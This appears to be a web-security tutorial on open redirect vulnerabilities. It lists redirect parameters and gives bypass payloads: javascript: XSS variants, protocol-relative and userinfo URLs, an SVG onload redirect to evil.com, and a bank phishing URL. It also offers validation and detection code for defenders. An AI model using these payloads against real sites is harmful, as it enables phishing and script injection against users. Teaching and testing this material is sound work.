# Open Redirect

{% tabs %}
{% tab title="Support VeryLazyTech 🎉" %}

* Become VeryLazyTech [**member**](https://shop.verylazytech.com/l/Membership)**! 🎁**
* **Follow** us on:
  * **✖ Twitter** [**@VeryLazyTech**](https://x.com/verylazytech)**.**
  * **👾 Github** [**@VeryLazyTech**](https://github.com/verylazytech)**.**
  * **📜 Medium** [**@VeryLazyTech**](https://medium.com/@verylazytech)**.**
  * **📺 YouTube** [**@VeryLazyTech**](https://www.youtube.com/@VeryLazyTechOfficial)**.**
  * **📩 Telegram** [**@VeryLazyTech**](https://t.me/+mSGyb008VL40MmVk)**.**
  * **🕵️‍♂️ My Site** [**@VeryLazyTech**](https://www.verylazytech.com/)**.**
* Visit our [**shop** ](https://shop.verylazytech.com/)for e-books and courses.  📚
{% endtab %}
{% endtabs %}

## **Basic info - Open Redirect**

**Open Redirect** (also known as **Unvalidated Redirects and Forwards**) occurs when a web application accepts user-supplied input and redirects the user to an arbitrary URL without proper validation.

{% embed url="https://www.youtube.com/watch?v=dCfpY64WX9I" %}

### How to find entry points to test?

* Burp Proxy history & Burp Sitemap (look at URLs with parameters)
* Google dorking. E.g: `inurl:redirectUrl=http site:target.com`
* Functionalities usually associated with redirects:
  * Login, Logout, Register & Password reset pages
  * Change site language
  * Links in emails
* Read JavaScript code
* Bruteforcing
  * Look for hidden redirect parameters, e.g.:
  * `/redirect?url={payload}&next={payload}&redirect={payload}&redir={payload}&rurl={payload}&redirect_uri={payload}`
  * `/?url={payload}&next={payload}&redirect={payload}&redir={payload}&rurl={payload}&redirect_uri={payload}`

### Responses to look for when fuzzing

* HTTP redirect status codes
  * [300 Multiple Choices](https://httpstatuses.com/300)
  * [301 Moved Permanently](https://httpstatuses.com/301)
  * [302 Found](https://httpstatuses.com/302)
  * [303 See Other](https://httpstatuses.com/303)
  * [304 Not Modified](https://httpstatuses.com/304)
  * [305 Use Proxy](https://httpstatuses.com/305)
  * [307 Temporary Redirect](https://httpstatuses.com/307)
  * [308 Permanent Redirect](https://httpstatuses.com/308)
* Alert box popping up

***

## Tips

* Try using the same parameter twice: `?next=whitelisted.com&next=google.com`
* If periods are filtered, use an IPv4 address in decimal notation <http://www.geektools.com/geektools-cgi/ipconv.cgi>
* Try a double-URL and triple-URL encoded version of payloads
* Try redirecting to an IP address (instead of a domain) using [different notations](http://www.agarri.fr/docs/AppSecEU15-Server_side_browsing_considered_harmful.pdf): IPv6, IPv4 in decimal, hex or octal
* For XSS, try replacing alert(1) with prompt(1) & confirm(1)
* If the file extension is checked, try `?image_url={payload}/.jpg`
* Try `target.com/?redirect_url=.uk` (or `[any_param]=.uk`). If it redirects to target.com.uk, then it’s vulnerable: target.com.uk and target.com are different domains.
* Use the U+202E RIGHT-TO-LEFT OVERRIDE character (UTF-8 `%E2%80%AE`): `https://whitelisted.com@%E2%80%AE@moc.elgoog`
  * The unicode character U+202E changes all subsequent text to be right-to-left
  * E.g.: <https://hackerone.com/reports/299403>

***

## **Identifying Open Redirect Vulnerabilities**

### **Common Parameters to Test**

Many applications use redirection parameters like:

```
/{payload}
?next={payload}
?url={payload}
?target={payload}
?rurl={payload}
?dest={payload}
?destination={payload}
?redir={payload}
?redirect_uri={payload}
?redirect_url={payload}
?redirect={payload}
/redirect/{payload}
/cgi-bin/redirect.cgi?{payload}
/out/{payload}
/out?{payload}
?view={payload}
/login?to={payload}
?image_url={payload}
?go={payload}
?return={payload}
?returnTo={payload}
?return_to={payload}
?checkout_url={payload}
?continue={payload}
?return_path={payload}
success=https://www.verylazytech.com
data=https://www.verylazytech.com
qurl=https://www.verylazytech.com
login=https://www.verylazytech.com
logout=https://www.verylazytech.com
ext=https://www.verylazytech.com
clickurl=https://www.verylazytech.com
goto=https://www.verylazytech.com
rit_url=https://www.verylazytech.com
forward_url=https://www.verylazytech.com
@https://www.verylazytech.com
forward=https://www.verylazytech.com
pic=https://www.verylazytech.com
callback_url=https://www.verylazytech.com
jump=https://www.verylazytech.com
jump_url=https://www.verylazytech.com
click?u=https://www.verylazytech.com
originUrl=https://www.verylazytech.com
origin=https://www.verylazytech.com
Url=https://www.verylazytech.com
desturl=https://www.verylazytech.com
u=https://www.verylazytech.com
page=https://www.verylazytech.com
u1=https://www.verylazytech.com
action=https://www.verylazytech.com
action_url=https://www.verylazytech.com
Redirect=https://www.verylazytech.com
sp_url=https://www.verylazytech.com
service=https://www.verylazytech.com
recurl=https://www.verylazytech.com
j?url=https://www.verylazytech.com
url=//https://www.verylazytech.com
uri=https://www.verylazytech.com
allinurl:https://www.verylazytech.com
q=https://www.verylazytech.com
link=https://www.verylazytech.com
src=https://www.verylazytech.com
tc?src=https://www.verylazytech.com
linkAddress=https://www.verylazytech.com
location=https://www.verylazytech.com
burl=https://www.verylazytech.com
request=https://www.verylazytech.com
backurl=https://www.verylazytech.com
RedirectUrl=https://www.verylazytech.com
ReturnUrl=https://www.verylazytech.com
```

If these parameters are processed without validation, they might be vulnerable.

### **Passive Detection**

1. **Check URL parameters** – Look for redirect-related keywords in URLs.
2. **Analyze HTTP responses** – Look for **302 Found** or **301 Moved Permanently** responses.
3. **Check developer console (F12) and network traffic** – Inspect redirects.

### **Active Testing (Manual and Automated)**

* **Modify the URL and inject external domains**:

  ```
  https://example.com/login?redirect=https://evil.com
  ```
* **Using Burp Suite's Intruder to fuzz redirection parameters**.
* **Using tools like Oralyzer**:

  ```bash
  python3 oralyzer.py -u "https://example.com?redirect="
  ```
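The triage step that follows a fuzzing run, as an added Python example (not code from the original page or from Oralyzer): it resolves each response's `Location` header, or a `<meta http-equiv="refresh">` in a 200 body, the way a browser would and keeps only the hops that leave the target host or use a non-http scheme. The request/response pairs are constructed for this example, and `example.com` / `evil.com` stand in for the target and an external host.

```python
# Added example: classify captured fuzz responses for open-redirect candidates.
from html.parser import HTMLParser
from urllib.parse import parse_qs, urljoin, urlparse

# 3xx codes whose Location header the browser follows (304/305 normally carry none)
REDIRECT_STATUSES = {300, 301, 302, 303, 307, 308}


class _MetaRefreshParser(HTMLParser):
    """Extract the target of <meta http-equiv="refresh" content="0;url=..."> if present."""

    def __init__(self):
        super().__init__()
        self.target = None

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        if tag.lower() == "meta" and a.get("http-equiv", "").lower() == "refresh":
            content = a.get("content", "")
            idx = content.lower().find("url=")
            if idx != -1:
                self.target = content[idx + 4:].strip().strip("'\"")


def resolve_redirect(request_url, status, headers, body=""):
    """Return the absolute URL the browser would land on, or None if nothing redirects."""
    hdrs = {k.lower(): v for k, v in headers.items()}
    if status in REDIRECT_STATUSES and "location" in hdrs:
        # urljoin applies the page's scheme to "//evil.com" and resolves "/path" on-site
        return urljoin(request_url, hdrs["location"])
    parser = _MetaRefreshParser()
    parser.feed(body)
    if parser.target:
        return urljoin(request_url, parser.target)
    return None


def triage(request_url, status, headers, body="", param="redirect"):
    """Classify one fuzz result: None when nothing redirects, else a finding dict."""
    target = resolve_redirect(request_url, status, headers, body)
    if target is None:
        return None
    req = urlparse(request_url)
    tgt = urlparse(target)
    payload = parse_qs(req.query).get(param, [""])[0]
    scheme_ok = tgt.scheme in ("http", "https")
    # Exact host comparison: "example.com.evil.com" is not "example.com"
    external = not scheme_ok or tgt.hostname != req.hostname
    return {
        "payload": payload,
        "target": target,
        "status": status,
        "external": external,
        "dangerous_scheme": not scheme_ok,
    }


# Constructed fuzz results (not real traffic) covering the response shapes listed above
SAMPLES = [
    ("https://example.com/login?redirect=https://evil.com", 302, {"Location": "https://evil.com"}, ""),
    ("https://example.com/login?redirect=//evil.com", 302, {"Location": "//evil.com"}, ""),
    ("https://example.com/login?redirect=/dashboard", 303, {"Location": "/dashboard"}, ""),
    ("https://example.com/login?redirect=https://example.com.evil.com", 301,
     {"Location": "https://example.com.evil.com/"}, ""),
    ("https://example.com/login?redirect=javascript:alert(1)", 200, {"Content-Type": "text/html"},
     '<html><head><meta http-equiv="refresh" content="0;url=javascript:alert(1)"></head></html>'),
    ("https://example.com/login?redirect=x", 200, {"Content-Type": "text/html"}, "<html>ok</html>"),
]


def findings(samples=SAMPLES):
    """Return only the results worth a closer look: off-host hops or non-http schemes."""
    out = []
    for request_url, status, headers, body in samples:
        f = triage(request_url, status, headers, body)
        if f and f["external"]:
            out.append(f)
    return out


if __name__ == "__main__":
    for f in findings():
        flag = " (non-http scheme)" if f["dangerous_scheme"] else ""
        print(f"{f['status']} {f['payload']!r} -> {f['target']}{flag}")
```

Same-site hops such as `/dashboard` are dropped on purpose: a redirect is only a finding when the resolved host differs from the host that served the response, or when the scheme is something a browser would execute rather than fetch.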

***

## **Exploiting Open Redirect Vulnerabilities**

### **Basic Open Redirect Exploitation**

If an application blindly trusts user input, you can redirect a victim to a malicious website:

```
https://example.com/login?redirect=http://evil.com
```

or use encoded URLs:

```
https://example.com/login?redirect=%68%74%74%70%3a%2f%2fevil.com
```

### **Redirect to Localhost (Bypass Authentication)**

If an application allows redirection to localhost:

```
https://example.com/login?redirect=http://127.0.0.1
```

It can be used to:

* Redirect an admin panel login to an internal resource.
* Exploit internal APIs (in SSRF attacks).

### **URL Format Bypass**

Some applications attempt to restrict external domains but allow different URL formats:

```
https://example.com/login?redirect=//evil.com
https://example.com/login?redirect=//evil.com@trusted.com
```

* `//evil.com` is a protocol-relative (scheme-less) URL: the browser reuses the current page's scheme, so on an HTTPS site it resolves to `https://evil.com`.
* `@trusted.com` is ignored by some browsers.

***

## **Open Redirect to XSS**

Some browsers allow **JavaScript-based redirects** if improperly filtered.

### **Basic Payloads**

```
javascript:alert(1)
```

or bypassing `javascript` filters:

```
java%0d%0ascript%0d%0a:alert(0)
```

### **Using Comments and Encoding**

```
javascript://sub.domain.com/%0Aalert(1)
javascript://%250Aalert(1)
javascript://%250A1?alert(1):0
```

### **SVG File Exploit (Open Redirect via File Upload)**

Some applications allow uploading **SVG files** that can trigger JavaScript execution:

```xml
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<svg onload="window.location='http://evil.com'" xmlns="http://www.w3.org/2000/svg">
</svg>
```

If the website automatically loads SVG files, the redirection will be triggered.
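A server-side gate for uploaded SVG files, as an added Python example (not code from the original page): it parses the document and reports the active content an `onload`-style redirect relies on, so the upload can be rejected before it is ever rendered inline. The sample documents are constructed for this example; the first one mirrors the payload shape shown above.

```python
# Added example: flag script-capable content in an uploaded SVG before serving it.
# xml.etree is used so the block runs stand-alone; for production parsing of untrusted
# XML prefer the defusedxml package, which blocks entity-expansion attacks.
import xml.etree.ElementTree as ET


def _local(name):
    """Strip an XML namespace prefix: '{http://www.w3.org/2000/svg}svg' -> 'svg'."""
    return name.rsplit("}", 1)[-1].lower()


def svg_findings(svg_text):
    """Return the reasons this SVG can run script or navigate; an empty list means none found.

    Checks: <script> and <foreignObject> elements, any on* event-handler attribute, and
    href/xlink:href values with a javascript:, vbscript:, nested-SVG or non-image data: scheme.
    Entity-encoded values (&#x6a;avascript:) are already decoded by the XML parser.
    """
    findings = []
    root = ET.fromstring(svg_text)
    for elem in root.iter():
        tag = _local(elem.tag)
        if tag in ("script", "foreignobject"):
            findings.append(f"<{tag}> element")
        for attr, value in elem.attrib.items():
            name = _local(attr)
            if name.startswith("on"):
                findings.append(f"<{tag} {name}=...> event handler")
            elif name == "href":
                v = "".join(value.split()).lower()        # collapse "java\nscript:" tricks
                scheme = v.split(":", 1)[0] if ":" in v else ""
                if (scheme in ("javascript", "vbscript")
                        or (scheme == "data" and not v.startswith("data:image/"))
                        or v.startswith("data:image/svg")):
                    findings.append(f"<{tag} href> with {scheme}: URL")
    return findings


def is_safe_svg(svg_text):
    """True only when the document parses and no active content was found."""
    try:
        return not svg_findings(svg_text)
    except ET.ParseError:
        return False                                      # malformed upload: reject, don't guess


# Constructed samples: the onload redirect shape from above, a plain drawing, and two variants
ONLOAD_SVG = ('<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
              '<svg onload="window.location=\'http://evil.com\'" xmlns="http://www.w3.org/2000/svg"></svg>')
BENIGN_SVG = '<svg xmlns="http://www.w3.org/2000/svg"><circle cx="5" cy="5" r="4" fill="red"/></svg>'
SCRIPT_SVG = '<svg xmlns="http://www.w3.org/2000/svg"><script>window.location="http://evil.com"</script></svg>'
LINK_SVG = ('<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">'
            '<a xlink:href="java&#x0a;script:alert(1)"><text x="0" y="15">click</text></a></svg>')


def check_samples():
    """Run the gate over the constructed samples; returns {name: findings}."""
    return {
        "onload": svg_findings(ONLOAD_SVG),
        "benign": svg_findings(BENIGN_SVG),
        "script": svg_findings(SCRIPT_SVG),
        "link": svg_findings(LINK_SVG),
    }


if __name__ == "__main__":
    for name, found in check_samples().items():
        print(f"{name}: {'OK' if not found else found}")
```

Rejecting at upload time is the cheap half of the defence; the other half is never serving user uploads from the application's own origin (a separate static domain, or `Content-Disposition: attachment` for anything that is not rasterized), because an inline SVG that slips through runs with the site's origin.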

***

## **Exploiting Open Redirect for Phishing**

Attackers can craft **realistic-looking URLs** to trick users:

```
https://bank.com?redirect=https://bank.com.evil.com
```

Users might not notice the difference and enter their credentials.

***

## **Tools for Automating Open Redirect Testing**

### **Oralyzer (Automated Open Redirect Scanner)**

* GitHub: <https://github.com/0xNanda/Oralyzer>
* Run the tool:

  ```bash
  python3 oralyzer.py -u "https://example.com?redirect="
  ```

### **Fuzzing with Payload Lists**

* [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Open Redirect](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Open%20Redirect)

***

## **Defense Against Open Redirects**

### **Input Validation**

* Only allow **whitelisted domains** for redirection:

  ```python
  from urllib.parse import urlparse

  allowed_domains = ["mysafedomain.com"]
  # Parse the untrusted value and compare the parsed host name only, never the raw string;
  # assumes a Flask-style view where request.args holds the query parameters
  parsed_url = urlparse(request.args.get("redirect", ""))
  if parsed_url.hostname not in allowed_domains:
      return "Invalid redirect URL"
  ```

### **Use Relative URLs Instead of Absolute**

Instead of:

```php
header("Location: ".$_GET['redirect']);
```

Use:

```php
header("Location: /dashboard");
```

### **URL Sanitization**

Ensure the redirect URL starts with a trusted domain:

```php
// Anchor the end of the host: without "(\/|\?|#|$)" the pattern also accepts
// https://mysafedomain.com.evil.com and https://mysafedomain.com@evil.com
if (!preg_match("/^https:\/\/mysafedomain\.com(\/|\?|#|$)/i", $_GET['redirect'])) {
    die("Invalid redirect URL");
}
```
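The three defensive rules above (allowlist the host, prefer relative targets, never trust a string prefix) combined into one validator, as an added Python example that is not code from the original page. It is run against the bypass forms discussed on this page (`//evil.com`, `host@evil.com`, `mysafedomain.com.evil.com`, encoded and CRLF-split `javascript:`, decimal IP literals, `.uk`, the U+202E override) next to a port of the prefix check so the difference is visible. `ALLOWED_HOSTS`, the `/` fallback and the case list are assumptions.

```python
# Added example: exact-host allowlist validation for a redirect parameter.
import re
from urllib.parse import unquote, urlparse

ALLOWED_HOSTS = {"mysafedomain.com", "www.mysafedomain.com"}   # assumed allowlist


def naive_check(value):
    """Prefix check in the style of the regex above, kept only for comparison."""
    return re.match(r"^https://mysafedomain\.com", value) is not None


def safe_redirect_target(value, allowed_hosts=ALLOWED_HOSTS, fallback="/"):
    """Return a value that is safe to place in a Location header.

    Accepts a same-site relative path or an absolute http(s) URL whose parsed host
    name is exactly in the allowlist; anything else collapses to the fallback, so
    the caller can never be steered off-site.
    """
    if not isinstance(value, str):
        return fallback
    decoded = value
    for _ in range(3):                     # bounded: undo double/triple URL-encoding
        nxt = unquote(decoded)
        if nxt == decoded:
            break
        decoded = nxt
    # Drop whitespace, control and format characters (CR/LF splitting "java\r\nscript",
    # the U+202E right-to-left override); legitimate URLs carry none of these raw.
    decoded = "".join(ch for ch in decoded if ch.isprintable() and not ch.isspace())
    # Browsers treat "\" like "/" in URLs, so "/\evil.com" must be judged as "//evil.com".
    decoded = decoded.replace("\\", "/")

    # Same-site relative path: "/dashboard" yes, protocol-relative "//host" no.
    if decoded.startswith("/") and not decoded.startswith("//"):
        return decoded
    try:
        parsed = urlparse(decoded)
    except ValueError:                     # e.g. malformed IPv6 literal
        return fallback
    if parsed.scheme not in ("http", "https"):
        return fallback                    # javascript:, data:, scheme-less "evil.com" or ".uk"
    if parsed.username is not None or parsed.password is not None:
        return fallback                    # "trusted.com@evil.com" style userinfo tricks
    host = (parsed.hostname or "").rstrip(".")
    if host not in allowed_hosts:
        return fallback                    # host.com.evil.com, IP literals in any notation
    return decoded


# Constructed inputs: two legitimate values followed by the bypass forms from this page
CASES = [
    "/dashboard",
    "https://mysafedomain.com/account",
    "https://mysafedomain.com.evil.com/",
    "https://mysafedomain.com@evil.com/",
    "//evil.com",
    "/\\evil.com",
    "%68%74%74%70%3a%2f%2fevil.com",
    "java%0d%0ascript%0d%0a:alert(0)",
    "javascript://%250Aalert(1)",
    "http://2130706433/",
    ".uk",
    "https://whitelisted.com@%E2%80%AE@moc.elgoog",
]


def compare(cases=CASES):
    """Return {input: (naive_check accepts?, hardened result)} for each case."""
    return {c: (naive_check(c), safe_redirect_target(c)) for c in cases}


if __name__ == "__main__":
    for case, (naive, hardened) in compare().items():
        print(f"{case!r:50} naive={'accept' if naive else 'reject'}  hardened={hardened!r}")
```

The validator returns a destination rather than a boolean so the redirect code path has only one shape: `redirect(safe_redirect_target(request_value))`. Collapsing every rejected input to `/` avoids the separate "error page" branch that tends to be forgotten on one of several call sites.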

***

## Code examples <a href="#code-examples" id="code-examples"></a>

**.Net**

```csharp
// Redirect to a fixed, application-relative path rather than a user-supplied URL
Response.Redirect("~/mysafe-subdomain/login.aspx");
```

**Java**

```java
// HttpServletResponse: the target is a constant, not request input
response.sendRedirect("http://www.verylazytech.com");
```

**PHP**

```php
<?php
/* browser redirections*/
header("Location: http://www.verylazytech.com");
exit;
?>
```

***


